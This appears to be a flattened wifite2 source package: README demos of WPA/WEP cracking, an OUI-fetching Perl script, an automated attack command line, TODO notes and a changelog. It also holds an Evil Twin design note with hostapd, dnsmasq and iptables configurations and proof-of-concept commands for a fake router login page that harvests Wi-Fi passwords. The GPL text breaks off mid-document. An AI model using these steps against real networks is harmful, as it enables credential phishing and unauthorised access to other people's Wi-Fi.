& cracking a hidden access point (via the WPA Handshake attack): ![Decloaking and Cracking a hidden access point](https://i.imgur.com/F6VPhbm.gif) ------------- Cracking a weak WEP password (using the WEP Replay attack): ![Cracking a weak WEP password](https://i.imgur.com/jP72rVo.gif) ------------- Cracking a pre-captured handshake using John The Ripper (via the `--crack` option): ![--crack option](https://i.imgur.com/iHcfCjp.gif) wifite2-2.7.0/tools/0000755000175000017500000000000014437644461013606 5ustar sophiesophiewifite2-2.7.0/tools/fetch-oui0000755000175000017500000000715514437644461015427 0ustar sophiesophie#!/usr/bin/env perl use warnings; use strict; use Getopt::Std; use LWP::UserAgent; use Text::CSV; # # Use the file:// URLs to use the data from the debian ieee-data package. # Use the http:// URLs to use the data from the IEEE website. # # The entries will be written to the output in alphabetical key order, not # the order they are listed in the hash. my %ieee_reg_urls = ( # OUI => 'file:///usr/share/ieee-data/oui.csv', # MAM => 'file:///usr/share/ieee-data/mam.csv', # OUI36 => 'file:///usr/share/ieee-data/oui36.csv', # IAB => 'file:///usr/share/ieee-data/iab.csv', OUI => 'https://standards-oui.ieee.org/oui/oui.csv', MAM => 'https://standards-oui.ieee.org/oui28/mam.csv', OUI36 => 'https://standards-oui.ieee.org/oui36/oui36.csv', IAB => 'https://standards-oui.ieee.org/iab/iab.csv' ); my $default_filename='ieee-oui.txt'; # my $usage = qq/Usage: fetch-oui [options] Fetch the OUI (manufacturers) file from the IEEE website, so we may parse it through wifite and show manufacturers on targets.. 'options' is one or more of: -h Display this usage message. -f FILE Specify the output file. Default=$default_filename -v Give verbose progress messages. /; my %opts; my $verbose; my $filename; my $url; my $key; my $status; my $line; my @columns; my $lineno; my $total_entries=0; # # Process options # die "$usage\n" unless getopts('hf:u:v',\%opts); if ($opts{h}) { print "$usage\n"; exit(0); } if (defined $opts{f}) { $filename=$opts{f}; } else { $filename=$default_filename; } $verbose=$opts{v} ? 1 : 0; # # If the output filename already exists, rename it to filename.bak before # we create the new output file. # if (-f $filename) { print "Renaming $filename to $filename.bak\n" if $verbose; rename $filename, "$filename.bak" || die "Could not rename $filename to $filename.bak\n"; } # # Open the output file for writing. # print "Opening $filename for output\n" if $verbose; open OUTPUT, '>:encoding(UTF-8)', $filename || die "Could not open $filename for writing"; # # Write the header comments to the output file. # my ($sec,$min,$hour,$mday,$mon,$year,undef,undef,undef) = localtime(); $year += 1900; $mon++; my $date_string = sprintf("%04d-%02d-%02d %02d:%02d:%02d", $year, $mon, $mday, $hour, $min, $sec); # # Initialise Text::CSV object interface # my $csv = Text::CSV->new ({ binary => 1, auto_diag => 1 }); # # For each IEEE registry URL... # foreach $key (sort keys %ieee_reg_urls) { $url = $ieee_reg_urls{$key}; # # Fetch the content from the URL # print "Processing IEEE $key registry data from $url\n" if $verbose; my $ua = LWP::UserAgent->new; my $res = $ua->get($url); die $res->status_line unless $res->is_success; my $content = $res->content; my $content_length = length($content); die "Zero-sized response from from $url\n" unless ($content_length > 0); print "\tDownloaded $content_length bytes\n" if $verbose; # # Parse content and write MAC and Vendor fields to output file. # open(my $fh, '<:encoding(UTF-8)', \$content) || die "Could not open handle to content"; $csv->header($fh); $lineno=0; while (my $row = $csv->getline ($fh)) { my $mac = ${$row}[1]; my $vendor = ${$row}[2]; $vendor =~ s/^\s+|\s+$//g; # Remove leading and trailing whitespace print OUTPUT "$mac\t$vendor\n"; $lineno++; } print "\t$lineno $key entries written to $filename\n" if $verbose; $total_entries += $lineno; } # # All done. Close the output file and print OUI entry count # close OUTPUT || die "Error closing output file\n"; print "\nTotal of $total_entries MAC/Vendor mappings written to $filename\n"; wifite2-2.7.0/tools/run-automation.sh0000755000175000017500000000216114437644461017127 0ustar sophiesophie#!/usr/bin/env bash # # Added my personal automation settinngs to showcase what options may be feeded by parameters. # These settings is setting which attacks to run, tinme consumtion on each attach, fauling/timeout # parameters, as well as power (to ensure thee accesspoints are in range and quality for an incoming attack) # # But also other nifty parameters/options, like a "infinity" switch, avoid attacking targets in db. # --skip-crack is used to save time, as we can do that later with the --crack option. # For informational purposes, manufacturers are parsed in real-time with "--showm" and bssid with "--showb" # # "--reaver" is specified for WPS and PIXIE parsing, "--kill" is set to kill possible interference. # while I also use "-2" for 2,5ghz, rather than "-ab" (all bands) which increases scanner time. # # "--power" is set to ensure the targets are in good quality (in range) for a faster runthrough. # # So, enjoy! # python3 wifite.py --skip-crack --reaver -2 --showm --showb --kill --wpat 160 --pmkid-timeout 100 --wps-time 120 --no-nullpin --wps --power 28 -p 100 -inf --wps-timeout 50 --wps-fails 10 -ic wifite2-2.7.0/setup.cfg0000644000175000017500000000011714437644461014266 0ustar sophiesophie[install] install_scripts=/usr/sbin [wifite:pytest] flake8-ignore = E201 E231 wifite2-2.7.0/docs/0000755000175000017500000000000014437644461013376 5ustar sophiesophiewifite2-2.7.0/docs/EVILTWIN.md0000644000175000017500000003165014437644461015166 0ustar sophiesophieAn idea from Sandman: Include "Evil Twin" attack in Wifite. This page tracks the requirements for such a feature. Evil Twin ========= [Fluxion](https://github.com/FluxionNetwork/fluxion) is a popular example of this attack. The attack requires multiple wireless cards: 1. Hosts the twin. 2. Deauthenticates clients. As clients connect to the Evil Twin, they are redirected to a fake router login page. Clients enter the password to the target AP. The Evil Twin then: 1. Captures the Wifi password, 2. Verifies Wifi password against the target AP, 3. If valid, all clients are deauthed from Evil Twin so they re-join the target AP. 4. Otherwise, tell the user the password is invalid and to "try again". GOTO step #1. Below are all of the requirements/components that Wifite would need for this feature. DHCP ==== We need to auto-assign IP addresses to clients as they connect (via DHCP?). DNS Redirects ============= All DNS requests need to redirect to the webserver: 1. So we clients are encouraged to login. 2. So we can intercept health-checks by Apple/Google Rogue AP, Server IP Address, etc ================================ Probably a few ways to do this in Linux; should use the most reliable & supported method. Mainly we need to: 1. Spin up the Webserver on some port (8000) 2. Start the Rogue AP 3. Assign localhost on port 8000 to some subnet IP (192.168.1.254) 4. Start DNS-redirecting all hostnames to 192.168.1.254. 5. Start DHCP to auto-assign IPs to incoming clients. 6. Start deauthing clients of the real AP. I think steps 3-5 can be applied to a specific wireless card (interface). * TODO: More details on how to start the fake AP, assign IPs, DHCP, DNS, etc. * Fluxion using `hostapd`: [code](https://github.com/FluxionNetwork/fluxion/blob/16965ec192eb87ae40c211d18bf11bb37951b155/lib/ap/hostapd.sh#L59-L64) * Kali "Evil Wireless AP" (uses `hostapd`): [article](https://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/) * Fluxion using `airbase-ng`: [code](https://github.com/FluxionNetwork/fluxion/blob/16965ec192eb87ae40c211d18bf11bb37951b155/lib/ap/airbase-ng.sh#L76-L77) * TODO: Should the Evil Twin spoof the real AP's hardware MAC address? * Yes, looks like that's what Fluxion does ([code](https://github.com/FluxionNetwork/fluxion/blob/16965ec192eb87ae40c211d18bf11bb37951b155/lib/ap/hostapd.sh#L66-L74)). ROGUE AP ======== Gleaned this info from: * ["Setting up wireless access point in Kali"](https://www.psattack.com/articles/20160410/setting-up-a-wireless-access-point-in-kali/) by PSAttack * ["Kali Linux Evil Wireless Access Point"](https://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/) by OffensiveSecurity * ["SniffAir" hostapd script](https://github.com/Tylous/SniffAir/blob/master/module/hostapd.py) HOSTAPD ------- * Starts access point. * Not included in Kali by-default. * Installable via `aptinstall hostapd`. * [Docs](https://wireless.wiki.kernel.org/en/users/documentation/hostapd) Config file format (e.g. `~/hostapd.conf`): ``` driver=nl80211 # 'nl80211' appears in all hostapd tutorials I've found. ssid=$EVIL_SSID # SSID/name of Evil Twin (should match target's) hw_mode=$BAND # Wifi Band, e.g. "g" or "g+n" channel=$CHANNEL # Numeric, e.g. "6' ``` Run: ``` hostapd ~/hostapd.conf -i wlan0 ``` DNSMASQ ------- * Included in Kali. * Installable via `apt install dnsmasq` * Handles DNS and DHCP. * [Install & Overview](http://www.thekelleys.org.uk/dnsmasq/doc.html), [Manpage](http://www.thekelleys.org.uk/dnsmasq/docs/dnsmasq-man.html) Config file format (e.g. `~/dnsmasq.conf`): ``` interface=wlan0 dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 #no-resolv server=8.8.8.8 log-queries log-dhcp # Redirect all requests (# is wildcard) to IP of evil web server: # TODO: We should rely on iptables, right? Otherwise this redirects traffic from all ports... #address=/#/192.168.1.254 ``` "DNS Entries" file format (`~/dns_entries`): ``` [DNS Name] [IP Address] # TODO: Are wildcards are supported? * 192.168.1.254 # IP of web server ``` Run: ``` dnsmasq -C ~/dnsmasq.conf -H ~/dns_entries ``` IPTABLES -------- From [this thread on raspberrypi.org](https://www.raspberrypi.org/forums/viewtopic.php?p=288263&sid=b6dd830c0c241a15ac0fe6930a4726c9#p288263) > *Use iptables to redirect all traffic directed at port 80 to the http server on the Pi* > `sudo iptables -t nat -A PREROUTING -d 0/0 -p tcp –dport 80 -j DNAT –to 192.168.1.254:80` And from Andreas Wiese on [UnixExchange](https://unix.stackexchange.com/a/125300) > *You could get this with a small set of iptables rules redirecting all traffic to port 80 and 443 your AP's address:* > `# iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination localhost:80` > `# iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination localhost:80` TODO: * What about HTTPS traffic (port 443)? * We want to avoid browser warnings (scary in Chrome & Firefox). * Don't think we can send a 302 redirect to port 80 without triggering the invalid certificate issue. * sslstrip may get around this... DEAUTHING ========= While hosting the Evil Twin + Web Server, we need to deauthenticate clients from the target AP so they join the Evil Twin. Listening --------- We need to listen for more clients and automatically start deauthing new clients as they appear. This might be supported by existing tools... MDK --- Deauthing & DoS is easy to do using [MDK](https://tools.kali.org/wireless-attacks/mdk3) or `aireplay-ng`. I think MDK is a better tool for this job, but Wifite already requires the `aircrack` suite, so we should support both. TODO: Require MDK if it is miles-ahead of `aireplay-ng` TODO: Figure out MDK commands for persistent deauths; if we can provide a list of client MAC addresses & BSSIDs. Website ======= Router Login Pages ------------------ These are different for every vendor. Fluxion has a repo with fake login pages for a lot of popular router vendors ([FluxionNetwork/sites](https://github.com/FluxionNetwork/sites)). That repo includes sites in various languages. We need just the base router page HTML (Title/logo) and CSS (colors/font) for popular vendors. We also need a "generic" login page in case we don't have the page for a vendor. 1. Web server to host HTML, images, fonts, and CSS that the vendor uses. 3. Javascript to send the password to the webserver Language Support ---------------- Note: Users should choose the language to host; they know better than any script detection. Each router page will have a warning message telling the client they need to enter the Wifi password: * "Password is required after a router firmware update" The Login page content (HTML/images/css) could be reduced to just the logo and warning message. No navbars/sidebars/links to anything else. Then only the warning message needs to be templatized by-language (we only need one sentence per language). That would avoid the need for separate "sites" for each Vendor *and* language. But we probably need other labels to be translated as well: * Title of page ("Router Login Page") * "Password:" * "Re-enter Password:" * "Reconnect" or "Login" ...So 5 sentences per language. Not bad. The web server could send a Javascript file containing the language variable values: ```javascript document.title = 'Router Login'; document.querySelector('#warn').textContent('You need to login after router firmware upgrade.'); document.querySelector('#pass').textContent('Password:'); // ... ``` One HTML File ------------- We can compact everything into a single HTML file: 1. Inline CSS 2. Inline images (base64 image/jpg) 3. Some placeholders for the warning message, password label, login button. This would avoid the "lots of folders" problem; one folder for all .html files. E.g. `ASUS.html` can be chosen when the target MAC vendor contains `ASUS`. AJAX Password Submission ------------------------ The website needs to send the password to the webserver, likely through some endpoint (e.g. `./login.cgi?password1=...&password2=...`). Easy to do in Javascript (via a simple `
` or even `XMLHttpRequest`). Webserver ========= The websites served by the webserver is dynamic and depends on numerous variables. We want to utilize the CGIHTTPServer in Python which would make some the logic easier to track. Spoofing Health Checks ---------------------- Some devices (Android, iOS, Windows?) verify the AP has an internet connection by requesting some externally-hosted webpage. We want to spoof those webpages *exactly* so the client's device shows the Evil Twin as "online". Fluxion does this [here](https://github.com/FluxionNetwork/fluxion/tree/master/attacks/Captive%20Portal/lib/connectivity%20responses) (called *"Connectivity Responses"*). Specifically [in the `lighttpd.conf` here](https://github.com/FluxionNetwork/fluxion/blob/16965ec192eb87ae40c211d18bf11bb37951b155/attacks/Captive%20Portal/attack.sh#L687-L698). Requirements: * Webserver detects requests to these health-check pages and returns the expected response (HTML, 204, etc). TODO: Go through Fluxion to know hostnames/paths and expected responses for Apple & Google devices. HTTPS ----- What if Google, Apple requires HTTPS? Can we spoof the certs somehow? Or redirect to HTTP? Spoofing Router Login Pages --------------------------- We can detect the router vendor based on the MAC address. If we have a fake login page for that vendor, we serve that. Otherwise we serve a generic login page. TODO: Can we use macchanger to detect vendor, or have some mapping of `BSSID_REGEX -> HTML_FILE`? Password Capture ---------------- Webserver needs to know when a client enters a password. This can be accomplished via a simple CGI endpoint or Python script. E.g. `login.cgi` which reads `password1` and `password2` from the query string. Password Validation ------------------- The Webserver needs to know when the password is valid. This requires connecting to the target AP on an unused wireless card: 1. First card is hosting the webserver. It would be awkward if that went down. 2. Second card is Deauthing clients. This could be 'paused' while validating the password, but that may allow clients to connect to the target AP. 3. ...A third wifi card may make this cleaner. TODO: The exact commands to verify Wifi passwords in Linux; I'm guessing we have to use `wpa_supplicant` and the like. TODO: Choose the fastest & most-relaiable method for verifying wifi paswords Evil Webserver & Deauth Communication ------------------------------------- The access point hosting the Evil Twin needs to communicate with the Deauth mechanism: 1. Which BSSIDs to point to the Evil Twin, 2. Which BSSIDs to point to the real AP. Since the webserver needs to run for the full length of th attack, we could control the state of the attack inside the webserver. So the webserver would need to maintain: 1. List of BSSIDs to deauth from real AP (so they join Evil Twin), 2. List of BSSIDs to deauth from Evil Twin (so they join real AP), 3. Background process which is deauthing the above BSSIDs on a separate wireless card. I am not sure how feasible this is in Python; we could also resort to using static files to store the stage (e.g. JSON file with BSSIDs and current step -- e.g. "Shutting down" or "Waiing for password"). TODO: See if the CGIHTTPServer has some way we can maintain/alter background threads. TODO: See how hard it would be to maintain state in the CGIHTTPServer (do we have to use the filesystem?) Success & Cleanup ----------------- When the password is found, we want to send a "success" message to the AJAX request, so the user gets instant feedback (and maybe a "Reconnecting..." message). During shutdown, we need to deauth all clients from the Evil Twin so they re-join the real AP. This deauthing should continue until all clients are deauthenticated from the Evil Twin. Then the script can be stopped. Proof of Concept ================ Start AP and capture all port-80 traffic: ``` ifconfig wlan0 10.0.0.1/24 up # start dnsmasq for dhcp & dns resolution (runs in background) killall dnsmasq dnsmasq -C dnsmasq.conf # reroute all port-80 traffic to our machine iptables -N internet -t mangle iptables -t mangle -A PREROUTING -j internet iptables -t mangle -A internet -j MARK --set-mark 99 iptables -t nat -A PREROUTING -m mark --mark 99 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1 echo "1" > /proc/sys/net/ipv4/ip_forward iptables -A FORWARD -i eth0 -o wlan0 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -m mark --mark 99 -j REJECT iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # start wifi access point (new terminal) killall hostapd hostapd ./hostapd.conf -i wlan0 # start webserver on port 80 (new terminal) python -m SimpleHTTPServer 80 ``` Cleanup: ``` # stop processes # ctrl+c hostapd # ctrl+c python simple http server killall dnsmasq # reset iptables iptables -F iptables -X iptables -t nat -F iptables -t nat -X iptables -t mangle -F iptables -t mangle -X ``` wifite2-2.7.0/docs/TODO.md0000644000175000017500000003142514437644461014472 0ustar sophiesophie# TODO This file is a braindump of ideas to improve Wifite2 (or forward-looking to "Wifite3") ------------------------------------------------------ ### Better Dependency Handling When a dependency is not found, Wifite should walk the user through installing all required dependencies, and maybe the optional dependencies as well. The dependency-installation walkthrough should provide or auto-execute the install commands (`git clone`, `wget | tar && ./config`, etc). Since we have a Python script for every dependency (under `wifite/tools/` or `wifite/util/`), we use Python's multiple-inheritance to achieve this. Requirements: 1. A base *Dependency* class * `@abstractmethods` for `exists()`, `name()`, `install()`, `print_install()` 2. Update all dependencies to inherit *Dependency* * Override abstract methods 3. Dependency-checker to run at Wifite startup. * Check if all required dependencies exists. * If required deps are missing, Prompt to install all (optional+required) or just required, or to continue w/o install with warning. * If optional deps are missing, suggest `--install` without prompting. * Otherwise continue silently. ------------------------------------------------------ Versioning problems: * Pixiewps output differs depending on version * Likewise for reaver & bully * Reaver and bully args have changed significantly over the years (added/removed/required) * airodump-ng --write-interval=1 doesn't work on older versions * Same with --wps and a few other options :( * airmon-ng output differs, wifite sees "phy0" instead of the interface name. Misc problems: * Some people have problems with multiple wifi cards plugged in * Solution: User prompt when no devices are in monitor mode (ask first). * Some people want wifite to kill network manager, others don't. * Solution: User prompt to kill processes * Some people need --ignore-negative-one on some wifi cards. ------------------------------------------------------ ### Command-line Arguments Wifite is a 'Spray and Pray', 'Big Red Button' script. Wifite should not provide obscure options that only advanced users can understand. Advanced users can simply use Wifite's dependencies directly. -------------------------------- Every option in Wifite's should either: 1. Significantly affect how Wifite behaves (e.g. `pillage`, `5ghz`, '--no-wps', '--nodeauths') 2. Or narrow down the list of targets (e.g. filtering --wps --wep --channel) 3. Or set some flag required by certain hardware (packets per second) 4. Change timer settings for moving on or hit 'deadlocks' of some kind Any options that don't fall into the above buckets should be removed. -------------------------------- Currently there are way too many command-line options: * 8 options to configure a timeout in seconds (wpat, wpadt, pixiet, pixiest, wpst, wept, weprs, weprc) * I don't even know what these are or if they work anymore. * 5 options to configure Thresholds (WPS retry/fail/timeout, WEP pps/ivs) * And the WPS options are NOT consistent between Bully & Reaver. * "Num deauths" etc For most of these, We can just set a sane default value to avoid the `--help` Wall-of-Text. -------------------------------- The "Commands" (`cracked`, `crack`, `check`) should probably not start with `--`, e.g. `--crack` should be simply `crack` ------------------------------------------------------ ### Native Python Implementations Some dependencies of Wifite (aircrack suite, tshark, etc) could be replaced with native Python implementations. *Scapy* allows listening to and inspecting packets, writing pcap files, and other features. There's ways to change wireless channels, enumerate wireless devices, send Deauth packets, etc. all within Python. We could still utilize libraries when it's more trouble than it's worth to port to Python, like some of aircrack (chopchop, packetforge-ng). And some native Python implementations might be cross-platform, which would allow... ------------------------------------------------------ ### Non-Linux support (OSX & Windows) Some of Wifite's dependencies work on other OSes (airodump-ng) but some don't (airmon-ng). If it's possible to run these programs on Windows or OSX, Wifite should support that. ------------------------------------------------------ ### WPS Attacks Wifite's Pixie-Dust attack status output differs between Reaver & Bully. And the command line switches are... not even used by bully? Ideally for Pixie-Dust, we'd have: 1. Switch to set bully/reaver timeout 2. Identical counters between bully/reaver (failures, timeouts, lockouts) * I don't think users should be able to set failure/timeout thresholds (no switches). 3. Identical statuses between bully/reaver. * Errors: "WPSFail", "Timeout", "NoAssoc", etc * Statuses: "Waiting for target", "Trying PIN", "Sending M2 message", "Running pixiewps", etc. * "Step X/Y" is nice, but not entirely accurate. * It's weird when we go from (6/8) to (5/8) without explanation. And the first 4 are usually not displayed. 3. Countdown timer until attack is aborted (e.g. 5min) 4. Countdown timer on "step timeout" (time since last status changed, e.g. 30s) Order of statuses: 1. Waiting for beacon 2. Associating with target 3. Trying PIN / EAPOL start / identity response / M1,M2 (M3,M4) 4. Running pixiewps 5. Cracked or Failed wifite wasn't made for heavy memory lifting cracking, rather to be a tool to use 'on the run', therefor it includes a probeable wordlist, rather than those bigger tables/lists out there. Multi-day (possibly multi-month) attacks aren't a good fit for Wifite. Users with that kind of dedication can run bully/reaver/hashcat themselves. ------------------------------------------------------ ### Directory structure **Note: This was mostly done in the great refactoring of Late March 2018** Too modular in some places, not modular enough in others. Not "/py": * **aircrack/** * `aircrack.py` <- process * `airmon.py` <- process * `airodump.py` <- process * `aireplay.py` <- process * **attack/** * `decloak.py` <- aireplay, airodump * `wps-pin.py` <- reaver, bully * `wps-pixie.py` <- reaver, bully * `wpa.py` (handshake only) <- aireplay, airodump * `wep.py` (relay, chopchop) <- aireplay, airodump * `config.py` * **crack/** * `crackwep.py` <- target, result, aireplay, aircrack * `crackwpa.py` <- target, handshake, result, aircrack * **handshake/** * `tshark.py` <- process * `cowpatty.py` <- process * `handshake.py` <- tshark, cowpatty, aircrack * `output.py` (color/printing) <- config * `process.py` <- config * `scan.py` (airodump output to target) <- config, target, airodump * **target/** * `target.py` (ssid, pcap file) <- airodump, tshark * `result.py` (PIN/PSK/KEY) ------------------------------------------------------ ### Dependency injection * Initialize each dependency at startup or when first possible. * Pass dependencies to modules that require them. * Modules that call aircrack expect aircrack.py * Modules that print expect output.py * Unit test using mocked dependencies. ------------------------------------------------------ ### Dependencies **AIRMON** * Detect interfaces in monitor mode. * Check if config interface name is found. * Enable or Disable monitor mode on a device. **AIRODUMP** * Run as daemon (background thread) * Accept flags as input (--ivs, --wps, etc) * Construct a Target for all found APs * Each Target includes list of associated Clients * Can parse CSV to find lines with APs and lines with Clients * Option to read from 1) Stdout, or 2) a CapFile * Identify Target's attributes: ESSID, BSSID, AUTH * Identify cloaked Targets (ESSID=null) * Return filtered list of Targets based on AUTH, ESSID, BSSID * XXX: Reading STDOUT might not match what's in the Cap file... * XXX: But STDOUT gives us WPS and avoids WASH... **TARGET** * Constructed via passed-in CSV (airodump-ng --output-format=csv) * Needs info on the current AP (1 line) and ALL clients (n lines) * Keep track of BSSID, ESSID, Channel, AUTH, other attrs * Construct Clients of target * Start & return an Airodump Daemon (e.g. WEP needs --ivs flag) **AIREPLAY** * Fakeauth * (Daemon) Start fakeauth process * Detect fakeauth status * End fakeauth process * Deauth * Call aireplay-ng to deauth a Client BSSID+ESSID * Return status of deauth * Chopchop & Fragment 1. (Daemon) Start aireplay-ng --chopchop or --fragment on Target 2. LOOP 1. Detect chopchop/fragment status (.xor or EXCEPTION) 2. If .xor is created: * Call packetforge-ng to forge cap * Arpreplay on forged cap 3. If running time > threshold, EXCEPTION * Arpreplay 1. (Daemon) Start aireplay-ng to replay given capfile 2. Detect status of replay (# of packets) 3. If running time > threshold and/or packet velocity < threshold, EXCEPTION **AIRCRACK** * Start aircrack-ng for WEP: Needs pcap file with IVS * Start aircrack-ng for WPA: Needs pcap file containing Handshake * Check status of aircrack-ng (`percenage`, `keys-tried`) * Return cracked key **CONFIG** * Key/value stores: 1) defaults and 2) customer-defined * Reads from command-line arguments (+input validation) * Keys to filter scanned targets by some attribute * Filter by AUTH: --wep, --wpa * Filter by WPS: --wps * Filter by channel: --channel * Filter by bssid: --bssid * Filter by essid: --essid * Keys to specify attacks * WEP: arp-replay, chopchop, fragmentation, etc * WPA: Just handshake? * WPS: pin, pixie-dust * Keys to specify thresholds (running time, timeouts) * Key to specify the command to run: * SCAN (default), CRACK, INFO ------------------------------------------------------ ### Process Workflow **MAIN**: Starts everything 1. Parse command-line args, override defaults 2. Start appropriate COMMAND (SCAN, ATTACK, CRACK, INFO) **SCAN**: (Scan + Attack + Result) 1. Find interface, start monitor mode (airmon.py) 2. LOOP 1. Get list of filtered targets (airodump.py) * Option: Read from CSV every second or parse airodump STDOUT 2. Decloak SSIDs if possible (decloak.py) 3. Sort targets; Prefer WEP over WPS over WPA(1+ clients) over WPA(noclient) 4. Print targets to screen (ESSID, Channel, Power, WPS, # of clients) 5. Print decloaked ESSIDs (if any) 6. Wait 5 seconds, or until user interrupts 3. Prompt user to select target or range of targets 4. FOR EACH target: 1. ATTACK target based on CONFIG (WEP/WPA/WPS) 2. Print attack status (cracked or error) 3. WPA-only: Start cracking Handshake 4. If cracked, test credentials by connecting to the router (?). **ATTACK** (All types) Returns cracked target information or throws exception **ATTACK WEP** 0. Expects: Target 1. Start Airodump to capture IVS from the AP (airodump) 2. LOOP 1. (Daemon) Fakeauth with AP if needed (aireplay, config) 2. (Daemon?) Perform appropriate WEP attack (aireplay, packetforge) 3. If airodump IVS > threshold: 1. (Daemon) If Aircrack daemon is not running, start it. (aircrack) 2. If successful, add password to Target and return. 4. If aireplay/others and IVS has not changed in N seconds, restart attack. 5. If running time > threshold, EXCEPTION **ATTACK WPA**: Returns cracked Target or Handshake of Target 0. Expects: Target 1. Start Airodump to capture PCAP from the Target AP 2. LOOP 1. Get list of all associated Clients, add "*BROADCAST*" 2. (Daemon) Deauth a single client in list. 3. Print status (time remaining, clients, deauths sent) 4. Copy PCAP and check for Handshake 5. If handshake is found, save to ./hs/ and BREAK 6. If running time > threshold, EXCEPTION 3. (Daemon) If Config has a wordlist, try crack handshake (airodump) 1. If successful, add PSK to target and return 4. If not cracking or crack is unsuccessful, mark PSK as "Handshake" and return **ATTACK WPS** 0. Expects: Target 1. For each attack (PIN and/or Pixie-Dust based on CONFIG): 1. (Daemon) Start Reaver/Bully (PIN/Pixie-Dust) 2. LOOP 1. Print Pixie status 2. If Pixie is successful, add PSK+PIN to Target and return 3. If Pixie failures > threshold, EXCEPTION 4. If Pixie is locked out == CONFIG, EXCEPTION 5. If running time > threshold, EXCEPTION **CRACK WEP** 0. Expects: String pcap file containing IVS 2. FOR EACH Aircrack option: 1. (Daemon) Start Aircrack 2. LOOP 1. Print Aircrack status 2. If Aircrack is successful, print result 3. If unsuccessful, EXCEPTION **CRACK WPA** 0. Expects: String pcap file containing Handshake (optional: BSSID/ESSID) 1. Select Cracking option (Aircrack, Cowpatty) 2. (Daemon) Start attack 3. LOOP 1. Print attack status if possible 2. If successful, print result 3. If unsuccessful, EXCEPTION **INFO** * Print list of handshake files with ESSIDs, Dates, etc. * Show options to `--crack` handshakes (or execute those commands directly) * Print list of cracked Targets (including WEP/WPA/WPS key) ------------------------------------------------------ wifite2-2.7.0/changelog0000644000175000017500000000604614437644461014326 0ustar sophiesophie2022-10 Contributor(s): kimocoder add python3.11 to setup classifiers - - - - - - - - - - - - - - - - - - - - - - - - - - - 2022-08 Contributor(s): kimocoder Christian Bremvåg tiagogalvao setup.py: Enhance the installation/setup setup.py: Remove code leftovers Fix python-3.12 deprecated library Merge branch 'master' into tests# Conflicts:# wifite/model/handshake.py Merge pull request #102 from tiagogalvao/v2.7-flake8v2.7 preparation: code cleanup based on flake8 suggestions - - - - - - - - - - - - - - - - - - - - - - - - - - - 2022-07 Contributor(s): tiagogalvao v2.7 preparation: code cleanup based on flake8 suggestions - - - - - - - - - - - - - - - - - - - - - - - - - - - 2022-04 Contributor(s): kimocoder Tiago Pires Merge branch 'kimocoder:master' into issue85 Cleanup and general code enhancement - - - - - - - - - - - - - - - - - - - - - - - - - - - 2022-03 Contributor(s): Christian Bremvåg tiagogalvao Merge pull request #84 from tiagogalvao/theBoringBranchBunch of boring stuff and minor fixes Bunch of boring stuff and minor fixes - - - - - - - - - - - - - - - - - - - - - - - - - - - 2021-01 Contributor(s): Christian Bremvåg Merge pull request #51 from sbrun/setupRemove the broken and redundant entry_points in setup.py - - - - - - - - - - - - - - - - - - - - - - - - - - - 2020-11 Contributor(s): Sophie Brun Remove the broken and redundant entry_points in setup.py - - - - - - - - - - - - - - - - - - - - - - - - - - - 2020-10 Contributor(s): kimocoder Various fixes and additions Fixed 'john' tool cracking + python3 enhancements New install method (Makefile) + ath_masker added* Changed install/uninstall/clean to a simplier method (using Makefile)* Added 'ath_masker' to wifite ath_masker explained: -------------------------------------- Install wifite then reboot/plug in your Wi-Fi card, and it will send acknowledgements to any Wi-Fi frame if the first 5 bytes of the destination MAC address equal its own address. In other words, you can now inject packets using the MAC address of the device, where the last byte of the MAC address can be anything. When other devices sent frames to these spoofed MAC addresses, the Atheros device will send ACKs.Signed off: kimocoder - - - - - - - - - - - - - - - - - - - - - - - - - - - 2020-09 Contributor(s): kimocoder Python code improvements - - - - - - - - - - - - - - - - - - - - - - - - - - - 2020-05 Contributor(s): kimocoder Some python3 improvements - - - - - - - - - - - - - - - - - - - - - - - - - - - 2020-01 Contributor(s): kimocoder Christian Bremvåg python3 cleanup patch Added a bunch of more python3 fixes Merge branch 'master' of https://github.com/kimocoder/wifite2 Update setup.py Cleanup setup.py - remove rest of python2.7 - - - - - - - - - - - - - - - - - - - - - - - - - - - 2019-12 Contributor(s): Christian Bremvåg Sophie Brun Merge pull request #6 from sbrun/masterFix wordlist name Fix wordlist name - - - - - - - - - - - - - - - - - - - - - - - - - - - wifite2-2.7.0/LICENSE0000644000175000017500000004317614437644461013466 0ustar sophiesophie GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR 